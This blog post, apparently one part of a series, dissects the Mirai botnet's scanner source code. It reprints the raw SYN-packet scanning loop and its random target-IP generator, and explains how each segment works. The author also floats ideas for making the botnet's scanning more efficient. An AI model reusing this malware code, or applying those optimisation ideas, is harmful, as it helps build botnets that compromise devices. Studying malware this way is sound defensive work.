Play-by-play of the Mirai botnet source code

In this entry about the Mirai botnet, we'll begin by entering the main parts of the Mirai botnet code that set it apart from most botnets of its day. In this portion of the code, the beginning of the "Main logic loop", it sends out SCANNER_RAW_PPS (160) SYN packets to random IP addresses around the world. This is the first stage of what is known as SYN scanning.

    // Main logic loop
    while (TRUE)
    {
        // (A)
        fd_set fdset_rd, fdset_wr;
        struct scanner_connection *conn;
        struct timeval tim;
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;

        // (B)
        // Spew out SYN to try and get a response
        if (fake_time != last_spew)
        {
            last_spew = fake_time;

            // (C)
            for (i = 0; i < SCANNER_RAW_PPS; i++)
            {
                struct sockaddr_in paddr = {0};
                struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

                iph->id = rand_next();
                iph->saddr = LOCAL_ADDR;
                iph->daddr = get_random_ip();
                iph->check = 0;
                iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));

                // (D)
                if (i % 10 == 0)
                {
                    tcph->dest = htons(2323);
                }
                else
                {
                    tcph->dest = htons(23);
                }
               
                tcph->seq = iph->daddr; // !!!
                tcph->check = 0;
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));

                paddr.sin_family = AF_INET;
                paddr.sin_addr.s_addr = iph->daddr;
                paddr.sin_port = tcph->dest;

                // (E)
                sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
            }
        }

In segment (A), the various variables are initialized that will need to be used later.

In segment (B), there is a check to see if fake_time is equal to last_spew or not. The variable fake_time is equal to the current system time of the device, set by the following code:

fake_time = time(NULL);

This code sets fake_time as the epoch time, accurate to the nearest second, so if fake_time != last_spew, then at least 1 second must have elapsed from when the fake_time was last set, and when the last_spew was set equal to the value of fake_time. Thus, effectively, this rate limits the sending out of SYN packets to have the code inside the conditional run not faster than once per second.

In segment (C), a for loop is made which loops SCANNER_RAW_PPS (160) times, each time sending out a SYN packet to some address. Various header values needed to craft an TCP SYN packet are done here:

struct sockaddr_in paddr = {0};
struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

iph->id = rand_next();
iph->saddr = LOCAL_ADDR;
iph->daddr = get_random_ip();
iph->check = 0;
iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));

The most interesting value set here, in my opinion is the daddr (destination IP address) which is set using the following function:

static ipv4_t get_random_ip(void)
{
    uint32_t tmp;
    uint8_t o1, o2, o3, o4;

    do
    {
        tmp = rand_next();

        o1 = tmp & 0xff;
        o2 = (tmp >> 8) & 0xff;
        o3 = (tmp >> 16) & 0xff;
        o4 = (tmp >> 24) & 0xff;
    }
    while (o1 == 127 ||                             // 127.0.0.0/8      - Loopback
          (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space
          (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company
          (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company
          (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service
          (o1 == 10) ||                             // 10.0.0.0/8       - Internal network
          (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved
          (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
    );

    return INET_ADDR(o1,o2,o3,o4);
}

IP addresses are generated uniformly at random, save a few specific subnets which are filtered out. To me, this calls to mind a few questions:

How did they know the list of specific subnets to avoid, and could this "discovery of bad subnets" have be done automatically as the botnet grows?
Is there a better way to generate IP addresses than just uniformly at random? As demonstrated in the famous Birthday Problem, as the size of the botnet grows, the number of times the same IP address "pigeonhole" will be tested twice by your botnet will increase at a surprising rate. Could IP address generation be done in a way to mitigate that?

Moving on to segment (D), the if-else conditional tells the scanner to try checking if port 2323 can accept TCP connections every 10th SYN packet, and all 9 other SYN packets, try port 23. This is because telnet uses port 23 most of the time, but some devices use telnet on port 2323. Some tuning must have been done to figure out if it is actually 10% off devices that use telnet on port 2323. Perhaps the botnet authors could have optimized this even further by actually verifying the distribution of ports that telnet is used on.

The even more interesting portion of segment (D), I think, is the line I have marked with "!!!". In the TCP handshake, the sequence number evolves in a very predictable way. For a more detailed but still readable explanation of how the sequence number evolves in a TCP handshake, check out this awesome resource from packetlife.net. In short, when the server (victim device) receives a SYN packet from the client (botnet-controlled device), the server takes the SYN packet's sequence number, adds 1 to it, and returns it to the client in the SYN-ACK packet as the acknowledgement number, as you can see in this image taken from the above linked resource:

Mirai sets this sequence number as a predictable number, the destination address of the receiving device, so that it will always know when a SYN-ACK is responding to a SYN packet that its malicious code sent out versus a SYN-ACK responding to a SYN packet the device sent out under normal usage by just checking to see if the acknowledgement number of that SYN-ACK is equal to the destination address + 1. This idea was likely derived from the idea of SYN cookies, a concept used for DDoS mitigation, which I will explore in a later blog post. The fact that the Mirai authors took this idea created for DDoS mitigation and reimagined it in a way that allowed it to be used to enable DDoS attacks, speaks to their creativity. Also, to me, this solution feels elegant in its irony.

In segment (E), the SYN packet spewing code concludes by commanding the device to send the SYN packet out to the internet via a rawsocket.

Stay tuned for the next installment on the Mirai botnet, where we will discuss how the scanners in the botnet process received SYN-ACKS!

Search This Blog

👨‍💻

Play-by-play of the Mirai botnet source code - Part 3 (scanner.c)

Comments

Post a Comment

Popular posts from this blog

First-Principles Derivation of A Bank

A Play-by-play of the Mirai botnet source code - Part 1 (scanner.c)

You can control individual packets using WinDivert!